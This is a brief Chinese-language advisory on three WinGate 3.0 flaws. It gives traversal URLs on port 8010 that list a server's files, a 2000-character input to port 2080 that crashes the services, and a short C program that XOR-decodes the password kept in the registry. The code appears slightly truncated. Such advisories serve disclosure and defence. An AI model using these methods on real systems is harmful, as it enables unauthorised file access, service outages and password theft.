|
WinGate3.0 远程/本地入侵漏洞(1)
受影响的系统:WinGate3.0 -Win9X -WinNT
不受影响的版本: 未知 远程: YES / 本地:YES
内容摘要:
作为共享internet线路的好工具,wingate的在线用户达2%以上,总用户占proxy service类软件的比例只怕有30% 以上,但是WinGate 3.0 有3个毛病.令入侵者可以远程侵入WinGate Server的硬盘. 漏洞的利用: 1,远程用户可以窃取文件 毛病是wingate的Log file service引起的,默认情况下,所有的wingate service是设置为仅127.0.0.1这样的本机用户才能访问的,但是log file service是让用户可以远程浏览的,所以.... 在以前的版本就有这个毛病,现在又有不同的形式: 假设对方运行wingate3.0,其host为 www.server.com,则可以用浏览器输入下列字串: 1 http://www.server.com:8010/c:/ - NT/Win9x
2http://www.server.com:8010// - NT/Win9x
3http://www.server.com:8010/..../ - Win9x
硬盘上每个文件就这样被列了出来 二,远程攻击 wingate 3.0的winsock重定向是设置在2080端口,当你用telnet之类的程序连接到这个port然后发送2000个字符然后断开, 所有的wingate服务都会完蛋
三.本地用户可以窃取密码. wingate放密码的注册表的键值是不安全的,任何本地用户都可以解密,这个密码也许和root密码是同一个.... 编译下面这段代码: #include "stdafx.h" #include
#include
main(int argc, char *argv[]) { char i;
for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;
| 
